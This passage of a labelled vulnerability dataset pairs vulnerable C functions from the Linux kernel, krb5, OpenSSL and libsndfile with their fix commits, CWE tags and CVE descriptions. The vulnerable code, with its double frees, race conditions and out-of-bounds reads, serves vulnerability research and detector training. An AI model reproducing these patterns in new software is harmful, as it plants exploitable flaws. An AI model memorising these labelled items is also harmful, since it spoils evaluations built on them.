"ISOFS: Directory relocation points to "
"itself\n");
goto eio;
}
ISOFS_I(inode)->i_first_extent = reloc_block;
reloc = isofs_iget_reloc(inode->i_sb, reloc_block, 0);
if (IS_ERR(reloc)) {
ret = PTR_ERR(reloc);
goto out;
}
inode->i_mode = reloc->i_mode;
set_nlink(inode, reloc->i_nlink);
inode->i_uid = reloc->i_uid;
inode->i_gid = reloc->i_gid;
inode->i_rdev = reloc->i_rdev;
inode->i_size = reloc->i_size;
inode->i_blocks = reloc->i_blocks;
inode->i_atime = reloc->i_atime;
inode->i_ctime = reloc->i_ctime;
inode->i_mtime = reloc->i_mtime;
iput(reloc);
break;
#ifdef CONFIG_ZISOFS
case SIG('Z', 'F'): {
int algo;
if (ISOFS_SB(inode->i_sb)->s_nocompress)
break;
algo = isonum_721(rr->u.ZF.algorithm);
if (algo == SIG('p', 'z')) {
int block_shift =
isonum_711(&rr->u.ZF.parms[1]);
if (block_shift > 17) {
printk(KERN_WARNING "isofs: "
"Can't handle ZF block "
"size of 2^%d\n",
block_shift);
} else {
/*
* Note: we don't change
* i_blocks here
*/
ISOFS_I(inode)->i_file_format =
isofs_file_compressed;
/*
* Parameters to compression
* algorithm (header size,
* block size)
*/
ISOFS_I(inode)->i_format_parm[0] =
isonum_711(&rr->u.ZF.parms[0]);
ISOFS_I(inode)->i_format_parm[1] =
isonum_711(&rr->u.ZF.parms[1]);
inode->i_size =
isonum_733(rr->u.ZF.
real_size);
}
} else {
printk(KERN_WARNING
"isofs: Unknown ZF compression "
"algorithm: %c%c\n",
rr->u.ZF.algorithm[0],
rr->u.ZF.algorithm[1]);
}
break;
}
#endif
default:
break;
}
}
ret = rock_continue(&rs);
if (ret == 0)
goto repeat;
if (ret == 1)
ret = 0;
out:
kfree(rs.buffer);
return ret;
eio:
ret = -EIO;
goto out;
}
| 76,826,098,986,089,410,000,000,000,000,000,000,000 | rock.c | 282,024,907,067,004,600,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-9584 | The parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux kernel before 3.18.2 does not validate a length value in the Extensions Reference (ER) System Use Field, which allows local users to obtain sensitive information from kernel memory via a crafted iso9660 image. | https://nvd.nist.gov/vuln/detail/CVE-2014-9584 |
1,612 | linux | a3a8784454692dd72e5d5d34dcdab17b4420e74c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/a3a8784454692dd72e5d5d34dcdab17b4420e74c | KEYS: close race between key lookup and freeing
When a key is being garbage collected, it's key->user would get put before
the ->destroy() callback is called, where the key is removed from it's
respective tracking structures.
This leaves a key hanging in a semi-invalid state which leaves a window open
for a different task to try an access key->user. An example is
find_keyring_by_name() which would dereference key->user for a key that is
in the process of being garbage collected (where key->user was freed but
->destroy() wasn't called yet - so it's still present in the linked list).
This would cause either a panic, or corrupt memory.
Fixes CVE-2014-9529.
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: David Howells <dhowells@redhat.com> | 1 | static noinline void key_gc_unused_keys(struct list_head *keys)
{
while (!list_empty(keys)) {
struct key *key =
list_entry(keys->next, struct key, graveyard_link);
list_del(&key->graveyard_link);
kdebug("- %u", key->serial);
key_check(key);
security_key_free(key);
/* deal with the user's key tracking and quota */
if (test_bit(KEY_FLAG_IN_QUOTA, &key->flags)) {
spin_lock(&key->user->lock);
key->user->qnkeys--;
key->user->qnbytes -= key->quotalen;
spin_unlock(&key->user->lock);
}
atomic_dec(&key->user->nkeys);
if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags))
atomic_dec(&key->user->nikeys);
key_user_put(key->user);
/* now throw away the key memory */
if (key->type->destroy)
key->type->destroy(key);
kfree(key->description);
#ifdef KEY_DEBUGGING
key->magic = KEY_DEBUG_MAGIC_X;
#endif
kmem_cache_free(key_jar, key);
}
}
| 146,841,926,446,616,660,000,000,000,000,000,000,000 | None | null | [
"CWE-362"
] | CVE-2014-9529 | Race condition in the key_gc_unused_keys function in security/keys/gc.c in the Linux kernel through 3.18.2 allows local users to cause a denial of service (memory corruption or panic) or possibly have unspecified other impact via keyctl commands that trigger access to a key structure member during garbage collection of a key. | https://nvd.nist.gov/vuln/detail/CVE-2014-9529 |
1,613 | libsndfile | dbe14f00030af5d3577f4cabbf9861db59e9c378 | https://github.com/erikd/libsndfile | https://github.com/erikd/libsndfile/commit/dbe14f00030af5d3577f4cabbf9861db59e9c378 | src/sd2.c : Fix two potential buffer read overflows.
Closes: https://github.com/erikd/libsndfile/issues/93 | 1 | sd2_parse_rsrc_fork (SF_PRIVATE *psf)
{ SD2_RSRC rsrc ;
int k, marker, error = 0 ;
psf_use_rsrc (psf, SF_TRUE) ;
memset (&rsrc, 0, sizeof (rsrc)) ;
rsrc.rsrc_len = psf_get_filelen (psf) ;
psf_log_printf (psf, "Resource length : %d (0x%04X)\n", rsrc.rsrc_len, rsrc.rsrc_len) ;
if (rsrc.rsrc_len > SIGNED_SIZEOF (psf->header))
{ rsrc.rsrc_data = calloc (1, rsrc.rsrc_len) ;
rsrc.need_to_free_rsrc_data = SF_TRUE ;
}
else
{
rsrc.rsrc_data = psf->header ;
rsrc.need_to_free_rsrc_data = SF_FALSE ;
} ;
/* Read in the whole lot. */
psf_fread (rsrc.rsrc_data, rsrc.rsrc_len, 1, psf) ;
/* Reset the header storage because we have changed to the rsrcdes. */
psf->headindex = psf->headend = rsrc.rsrc_len ;
rsrc.data_offset = read_rsrc_int (&rsrc, 0) ;
rsrc.map_offset = read_rsrc_int (&rsrc, 4) ;
rsrc.data_length = read_rsrc_int (&rsrc, 8) ;
rsrc.map_length = read_rsrc_int (&rsrc, 12) ;
if (rsrc.data_offset == 0x51607 && rsrc.map_offset == 0x20000)
{ psf_log_printf (psf, "Trying offset of 0x52 bytes.\n") ;
rsrc.data_offset = read_rsrc_int (&rsrc, 0x52 + 0) + 0x52 ;
rsrc.map_offset = read_rsrc_int (&rsrc, 0x52 + 4) + 0x52 ;
rsrc.data_length = read_rsrc_int (&rsrc, 0x52 + 8) ;
rsrc.map_length = read_rsrc_int (&rsrc, 0x52 + 12) ;
} ;
psf_log_printf (psf, " data offset : 0x%04X\n map offset : 0x%04X\n"
" data length : 0x%04X\n map length : 0x%04X\n",
rsrc.data_offset, rsrc.map_offset, rsrc.data_length, rsrc.map_length) ;
if (rsrc.data_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.data_offset (%d, 0x%x) > len\n", rsrc.data_offset, rsrc.data_offset) ;
error = SFE_SD2_BAD_DATA_OFFSET ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.map_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.map_offset > len\n") ;
error = SFE_SD2_BAD_MAP_OFFSET ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.data_length > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.data_length > len\n") ;
error = SFE_SD2_BAD_DATA_LENGTH ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.map_length > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.map_length > len\n") ;
error = SFE_SD2_BAD_MAP_LENGTH ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.data_offset + rsrc.data_length != rsrc.map_offset || rsrc.map_offset + rsrc.map_length != rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : This does not look like a MacOSX resource fork.\n") ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.map_offset + 28 >= rsrc.rsrc_len)
{ psf_log_printf (psf, "Bad map offset (%d + 28 > %d).\n", rsrc.map_offset, rsrc.rsrc_len) ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.string_offset = rsrc.map_offset + read_rsrc_short (&rsrc, rsrc.map_offset + 26) ;
if (rsrc.string_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Bad string offset (%d).\n", rsrc.string_offset) ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.type_offset = rsrc.map_offset + 30 ;
rsrc.type_count = read_rsrc_short (&rsrc, rsrc.map_offset + 28) + 1 ;
if (rsrc.type_count < 1)
{ psf_log_printf (psf, "Bad type count.\n") ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.item_offset = rsrc.type_offset + rsrc.type_count * 8 ;
if (rsrc.item_offset < 0 || rsrc.item_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Bad item offset (%d).\n", rsrc.item_offset) ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.str_index = -1 ;
for (k = 0 ; k < rsrc.type_count ; k ++)
{ marker = read_rsrc_marker (&rsrc, rsrc.type_offset + k * 8) ;
if (marker == STR_MARKER)
{ rsrc.str_index = k ;
rsrc.str_count = read_rsrc_short (&rsrc, rsrc.type_offset + k * 8 + 4) + 1 ;
error = parse_str_rsrc (psf, &rsrc) ;
goto parse_rsrc_fork_cleanup ;
} ;
} ;
psf_log_printf (psf, "No 'STR ' resource.\n") ;
error = SFE_SD2_BAD_RSRC ;
parse_rsrc_fork_cleanup :
psf_use_rsrc (psf, SF_FALSE) ;
if (rsrc.need_to_free_rsrc_data)
free (rsrc.rsrc_data) ;
return error ;
} /* sd2_parse_rsrc_fork */
| 340,051,541,888,924,920,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2014-9496 | The sd2_parse_rsrc_fork function in sd2.c in libsndfile allows attackers to have unspecified impact via vectors related to a (1) map offset or (2) rsrc marker, which triggers an out-of-bounds read. | https://nvd.nist.gov/vuln/detail/CVE-2014-9496 |
1,618 | krb5 | a197e92349a4aa2141b5dff12e9dd44c2a2166e3 | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/a197e92349a4aa2141b5dff12e9dd44c2a2166e3 | Fix kadm5/gssrpc XDR double free [CVE-2014-9421]
[MITKRB5-SA-2015-001] In auth_gssapi_unwrap_data(), do not free
partial deserialization results upon failure to deserialize. This
responsibility belongs to the callers, svctcp_getargs() and
svcudp_getargs(); doing it in the unwrap function results in freeing
the results twice.
In xdr_krb5_tl_data() and xdr_krb5_principal(), null out the pointers
we are freeing, as other XDR functions such as xdr_bytes() and
xdr_string().
ticket: 8056 (new)
target_version: 1.13.1
tags: pullup | 1 | bool_t auth_gssapi_unwrap_data(
OM_uint32 *major,
OM_uint32 *minor,
gss_ctx_id_t context,
uint32_t seq_num,
XDR *in_xdrs,
bool_t (*xdr_func)(),
caddr_t xdr_ptr)
{
gss_buffer_desc in_buf, out_buf;
XDR temp_xdrs;
uint32_t verf_seq_num;
int conf, qop;
unsigned int length;
PRINTF(("gssapi_unwrap_data: starting\n"));
*major = GSS_S_COMPLETE;
*minor = 0; /* assumption */
in_buf.value = NULL;
out_buf.value = NULL;
if (! xdr_bytes(in_xdrs, (char **) &in_buf.value,
&length, (unsigned int) -1)) {
PRINTF(("gssapi_unwrap_data: deserializing encrypted data failed\n"));
temp_xdrs.x_op = XDR_FREE;
(void)xdr_bytes(&temp_xdrs, (char **) &in_buf.value, &length,
(unsigned int) -1);
return FALSE;
}
in_buf.length = length;
*major = gss_unseal(minor, context, &in_buf, &out_buf, &conf,
&qop);
free(in_buf.value);
if (*major != GSS_S_COMPLETE)
return FALSE;
PRINTF(("gssapi_unwrap_data: %llu bytes data, %llu bytes sealed\n",
(unsigned long long)out_buf.length,
(unsigned long long)in_buf.length));
xdrmem_create(&temp_xdrs, out_buf.value, out_buf.length, XDR_DECODE);
/* deserialize the sequence number */
if (! xdr_u_int32(&temp_xdrs, &verf_seq_num)) {
PRINTF(("gssapi_unwrap_data: deserializing verf_seq_num failed\n"));
gss_release_buffer(minor, &out_buf);
XDR_DESTROY(&temp_xdrs);
return FALSE;
}
if (verf_seq_num != seq_num) {
PRINTF(("gssapi_unwrap_data: seq %d specified, read %d\n",
seq_num, verf_seq_num));
gss_release_buffer(minor, &out_buf);
XDR_DESTROY(&temp_xdrs);
return FALSE;
}
PRINTF(("gssapi_unwrap_data: unwrap seq_num %d okay\n", verf_seq_num));
/* deserialize the arguments into xdr_ptr */
if (! (*xdr_func)(&temp_xdrs, xdr_ptr)) {
PRINTF(("gssapi_unwrap_data: deserializing arguments failed\n"));
gss_release_buffer(minor, &out_buf);
xdr_free(xdr_func, xdr_ptr);
XDR_DESTROY(&temp_xdrs);
return FALSE;
}
PRINTF(("gssapi_unwrap_data: succeeding\n\n"));
gss_release_buffer(minor, &out_buf);
XDR_DESTROY(&temp_xdrs);
return TRUE;
}
| 6,731,538,295,626,295,000,000,000,000,000,000,000 | auth_gssapi_misc.c | 249,867,039,175,423,800,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2014-9421 | The auth_gssapi_unwrap_data function in lib/rpc/auth_gssapi_misc.c in MIT Kerberos 5 (aka krb5) through 1.11.5, 1.12.x through 1.12.2, and 1.13.x before 1.13.1 does not properly handle partial XDR deserialization, which allows remote authenticated users to cause a denial of service (use-after-free and double free, and daemon crash) or possibly execute arbitrary code via malformed XDR data, as demonstrated by data sent to kadmind. | https://nvd.nist.gov/vuln/detail/CVE-2014-9421 |
1,619 | openssl | 470990fee0182566d439ef7e82d1abf18b7085d7 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/470990fee0182566d439ef7e82d1abf18b7085d7 | Free up s->d1->buffered_app_data.q properly.
PR#3286 | 1 | static void dtls1_clear_queues(SSL *s)
{
pitem *item = NULL;
hm_fragment *frag = NULL;
DTLS1_RECORD_DATA *rdata;
while( (item = pqueue_pop(s->d1->unprocessed_rcds.q)) != NULL)
{
rdata = (DTLS1_RECORD_DATA *) item->data;
if (rdata->rbuf.buf)
{
OPENSSL_free(rdata->rbuf.buf);
}
OPENSSL_free(item->data);
pitem_free(item);
}
while( (item = pqueue_pop(s->d1->processed_rcds.q)) != NULL)
{
rdata = (DTLS1_RECORD_DATA *) item->data;
if (rdata->rbuf.buf)
{
OPENSSL_free(rdata->rbuf.buf);
}
OPENSSL_free(item->data);
pitem_free(item);
}
while( (item = pqueue_pop(s->d1->buffered_messages)) != NULL)
{
frag = (hm_fragment *)item->data;
OPENSSL_free(frag->fragment);
OPENSSL_free(frag);
pitem_free(item);
}
while ( (item = pqueue_pop(s->d1->sent_messages)) != NULL)
{
frag = (hm_fragment *)item->data;
OPENSSL_free(frag->fragment);
OPENSSL_free(frag);
pitem_free(item);
}
while ( (item = pqueue_pop(s->d1->buffered_app_data.q)) != NULL)
{
frag = (hm_fragment *)item->data;
OPENSSL_free(frag->fragment);
OPENSSL_free(frag);
pitem_free(item);
}
}
| 120,961,465,274,779,570,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2014-8176 | The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data. | https://nvd.nist.gov/vuln/detail/CVE-2014-8176 |
1,634 | linux | db29a9508a9246e77087c5531e45b2c88ec6988b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/db29a9508a9246e77087c5531e45b2c88ec6988b | netfilter: conntrack: disable generic tracking for known protocols
Given following iptables ruleset:
-P FORWARD DROP
-A FORWARD -m sctp --dport 9 -j ACCEPT
-A FORWARD -p tcp --dport 80 -j ACCEPT
-A FORWARD -p tcp -m conntrack -m state ESTABLISHED,RELATED -j ACCEPT
One would assume that this allows SCTP on port 9 and TCP on port 80.
Unfortunately, if the SCTP conntrack module is not loaded, this allows
*all* SCTP communication, to pass though, i.e. -p sctp -j ACCEPT,
which we think is a security issue.
This is because on the first SCTP packet on port 9, we create a dummy
"generic l4" conntrack entry without any port information (since
conntrack doesn't know how to extract this information).
All subsequent packets that are unknown will then be in established
state since they will fallback to proto_generic and will match the
'generic' entry.
Our originally proposed version [1] completely disabled generic protocol
tracking, but Jozsef suggests to not track protocols for which a more
suitable helper is available, hence we now mitigate the issue for in
tree known ct protocol helpers only, so that at least NAT and direction
information will still be preserved for others.
[1] http://www.spinics.net/lists/netfilter-devel/msg33430.html
Joint work with Daniel Borkmann.
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
Acked-by: Jozsef Kadlecsik <kadlec@blackhole.kfki.hu>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> | 1 | static bool generic_new(struct nf_conn *ct, const struct sk_buff *skb,
unsigned int dataoff, unsigned int *timeouts)
{
return true;
}
| 94,206,534,282,979,970,000,000,000,000,000,000,000 | nf_conntrack_proto_generic.c | 39,813,758,207,073,290,000,000,000,000,000,000,000 | [
"CWE-254"
] | CVE-2014-8160 | net/netfilter/nf_conntrack_proto_generic.c in the Linux kernel before 3.18 generates incorrect conntrack entries during handling of certain iptables rule sets for the SCTP, DCCP, GRE, and UDP-Lite protocols, which allows remote attackers to bypass intended access restrictions via packets with disallowed port numbers. | https://nvd.nist.gov/vuln/detail/CVE-2014-8160 |
1,635 | linux | 8d0207652cbe27d1f962050737848e5ad4671958 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8d0207652cbe27d1f962050737848e5ad4671958 | ->splice_write() via ->write_iter()
iter_file_splice_write() - a ->splice_write() instance that gathers the
pipe buffers, builds a bio_vec-based iov_iter covering those and feeds
it to ->write_iter(). A bunch of simple cases coverted to that...
[AV: fixed the braino spotted by Cyrill]
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | xfs_file_splice_write(
struct pipe_inode_info *pipe,
struct file *outfilp,
loff_t *ppos,
size_t count,
unsigned int flags)
{
struct inode *inode = outfilp->f_mapping->host;
struct xfs_inode *ip = XFS_I(inode);
int ioflags = 0;
ssize_t ret;
XFS_STATS_INC(xs_write_calls);
if (outfilp->f_mode & FMODE_NOCMTIME)
ioflags |= IO_INVIS;
if (XFS_FORCED_SHUTDOWN(ip->i_mount))
return -EIO;
xfs_ilock(ip, XFS_IOLOCK_EXCL);
trace_xfs_file_splice_write(ip, count, *ppos, ioflags);
ret = generic_file_splice_write(pipe, outfilp, ppos, count, flags);
if (ret > 0)
XFS_STATS_ADD(xs_write_bytes, ret);
xfs_iunlock(ip, XFS_IOLOCK_EXCL);
return ret;
}
| 58,931,614,698,813,260,000,000,000,000,000,000,000 | None | null | [
"CWE-264"
] | CVE-2014-7822 | The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file, which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, as demonstrated by use of a file descriptor associated with an ext4 filesystem. | https://nvd.nist.gov/vuln/detail/CVE-2014-7822 |
1,636 | krb5 | 102bb6ebf20f9174130c85c3b052ae104e5073ec | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/102bb6ebf20f9174130c85c3b052ae104e5073ec | Fix krb5_read_message handling [CVE-2014-5355]
In recvauth_common, do not use strcmp against the data fields of
krb5_data objects populated by krb5_read_message(), as there is no
guarantee that they are C strings. Instead, create an expected
krb5_data value and use data_eq().
In the sample user-to-user server application, check that the received
client principal name is null-terminated before using it with printf
and krb5_parse_name.
CVE-2014-5355:
In MIT krb5, when a server process uses the krb5_recvauth function, an
unauthenticated remote attacker can cause a NULL dereference by
sending a zero-byte version string, or a read beyond the end of
allocated storage by sending a non-null-terminated version string.
The example user-to-user server application (uuserver) is similarly
vulnerable to a zero-length or non-null-terminated principal name
string.
The krb5_recvauth function reads two version strings from the client
using krb5_read_message(), which produces a krb5_data structure
containing a length and a pointer to an octet sequence. krb5_recvauth
assumes that the data pointer is a valid C string and passes it to
strcmp() to verify the versions. If the client sends an empty octet
sequence, the data pointer will be NULL and strcmp() will dereference
a NULL pointer, causing the process to crash. If the client sends a
non-null-terminated octet sequence, strcmp() will read beyond the end
of the allocated storage, possibly causing the process to crash.
uuserver similarly uses krb5_read_message() to read a client principal
name, and then passes it to printf() and krb5_parse_name() without
verifying that it is a valid C string.
The krb5_recvauth function is used by kpropd and the Kerberized
versions of the BSD rlogin and rsh daemons. These daemons are usually
run out of inetd or in a mode which forks before processing incoming
connections, so a process crash will generally not result in a
complete denial of service.
Thanks to Tim Uglow for discovering this issue.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:P/E:POC/RL:OF/RC:C
[tlyu@mit.edu: CVSS score]
ticket: 8050 (new)
target_version: 1.13.1
tags: pullup | 1 | int main(argc, argv)
int argc;
char *argv[];
{
krb5_data pname_data, tkt_data;
int sock = 0;
socklen_t l;
int retval;
struct sockaddr_in l_inaddr, f_inaddr; /* local, foreign address */
krb5_creds creds, *new_creds;
krb5_ccache cc;
krb5_data msgtext, msg;
krb5_context context;
krb5_auth_context auth_context = NULL;
#ifndef DEBUG
freopen("/tmp/uu-server.log", "w", stderr);
#endif
retval = krb5_init_context(&context);
if (retval) {
com_err(argv[0], retval, "while initializing krb5");
exit(1);
}
#ifdef DEBUG
{
int one = 1;
int acc;
struct servent *sp;
socklen_t namelen = sizeof(f_inaddr);
if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
com_err("uu-server", errno, "creating socket");
exit(3);
}
l_inaddr.sin_family = AF_INET;
l_inaddr.sin_addr.s_addr = 0;
if (argc == 2) {
l_inaddr.sin_port = htons(atoi(argv[1]));
} else {
if (!(sp = getservbyname("uu-sample", "tcp"))) {
com_err("uu-server", 0, "can't find uu-sample/tcp service");
exit(3);
}
l_inaddr.sin_port = sp->s_port;
}
(void) setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (char *)&one, sizeof (one));
if (bind(sock, (struct sockaddr *)&l_inaddr, sizeof(l_inaddr))) {
com_err("uu-server", errno, "binding socket");
exit(3);
}
if (listen(sock, 1) == -1) {
com_err("uu-server", errno, "listening");
exit(3);
}
printf("Server started\n");
fflush(stdout);
if ((acc = accept(sock, (struct sockaddr *)&f_inaddr, &namelen)) == -1) {
com_err("uu-server", errno, "accepting");
exit(3);
}
dup2(acc, 0);
close(sock);
sock = 0;
}
#endif
retval = krb5_read_message(context, (krb5_pointer) &sock, &pname_data);
if (retval) {
com_err ("uu-server", retval, "reading pname");
return 2;
}
retval = krb5_read_message(context, (krb5_pointer) &sock, &tkt_data);
if (retval) {
com_err ("uu-server", retval, "reading ticket data");
return 2;
}
retval = krb5_cc_default(context, &cc);
if (retval) {
com_err("uu-server", retval, "getting credentials cache");
return 4;
}
memset (&creds, 0, sizeof(creds));
retval = krb5_cc_get_principal(context, cc, &creds.client);
if (retval) {
com_err("uu-client", retval, "getting principal name");
return 6;
}
/* client sends it already null-terminated. */
printf ("uu-server: client principal is \"%s\".\n", pname_data.data);
retval = krb5_parse_name(context, pname_data.data, &creds.server);
if (retval) {
com_err("uu-server", retval, "parsing client name");
return 3;
}
creds.second_ticket = tkt_data;
printf ("uu-server: client ticket is %d bytes.\n",
creds.second_ticket.length);
retval = krb5_get_credentials(context, KRB5_GC_USER_USER, cc,
&creds, &new_creds);
if (retval) {
com_err("uu-server", retval, "getting user-user ticket");
return 5;
}
#ifndef DEBUG
l = sizeof(f_inaddr);
if (getpeername(0, (struct sockaddr *)&f_inaddr, &l) == -1)
{
com_err("uu-server", errno, "getting client address");
return 6;
}
#endif
l = sizeof(l_inaddr);
if (getsockname(0, (struct sockaddr *)&l_inaddr, &l) == -1)
{
com_err("uu-server", errno, "getting local address");
return 6;
}
/* send a ticket/authenticator to the other side, so it can get the key
we're using for the krb_safe below. */
retval = krb5_auth_con_init(context, &auth_context);
if (retval) {
com_err("uu-server", retval, "making auth_context");
return 8;
}
retval = krb5_auth_con_setflags(context, auth_context,
KRB5_AUTH_CONTEXT_DO_SEQUENCE);
if (retval) {
com_err("uu-server", retval, "initializing the auth_context flags");
return 8;
}
retval =
krb5_auth_con_genaddrs(context, auth_context, sock,
KRB5_AUTH_CONTEXT_GENERATE_LOCAL_FULL_ADDR |
KRB5_AUTH_CONTEXT_GENERATE_REMOTE_FULL_ADDR);
if (retval) {
com_err("uu-server", retval, "generating addrs for auth_context");
return 9;
}
#if 1
retval = krb5_mk_req_extended(context, &auth_context,
AP_OPTS_USE_SESSION_KEY,
NULL, new_creds, &msg);
if (retval) {
com_err("uu-server", retval, "making AP_REQ");
return 8;
}
retval = krb5_write_message(context, (krb5_pointer) &sock, &msg);
#else
retval = krb5_sendauth(context, &auth_context, (krb5_pointer)&sock, "???",
0, 0,
AP_OPTS_MUTUAL_REQUIRED | AP_OPTS_USE_SESSION_KEY,
NULL, &creds, cc, NULL, NULL, NULL);
#endif
if (retval)
goto cl_short_wrt;
free(msg.data);
msgtext.length = 32;
msgtext.data = "Hello, other end of connection.";
retval = krb5_mk_safe(context, auth_context, &msgtext, &msg, NULL);
if (retval) {
com_err("uu-server", retval, "encoding message to client");
return 6;
}
retval = krb5_write_message(context, (krb5_pointer) &sock, &msg);
if (retval) {
cl_short_wrt:
com_err("uu-server", retval, "writing message to client");
return 7;
}
krb5_free_data_contents(context, &msg);
krb5_free_data_contents(context, &pname_data);
/* tkt_data freed with creds */
krb5_free_cred_contents(context, &creds);
krb5_free_creds(context, new_creds);
krb5_cc_close(context, cc);
krb5_auth_con_free(context, auth_context);
krb5_free_context(context);
return 0;
}
| 132,886,479,854,659,200,000,000,000,000,000,000,000 | server.c | 36,266,010,581,253,480,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2014-5355 | MIT Kerberos 5 (aka krb5) through 1.13.1 incorrectly expects that a krb5_read_message data field is represented as a string ending with a '\0' character, which allows remote attackers to (1) cause a denial of service (NULL pointer dereference) via a zero-byte version string or (2) cause a denial of service (out-of-bounds read) by omitting the '\0' character, related to appl/user_user/server.c and lib/krb5/krb/recvauth.c. | https://nvd.nist.gov/vuln/detail/CVE-2014-5355 |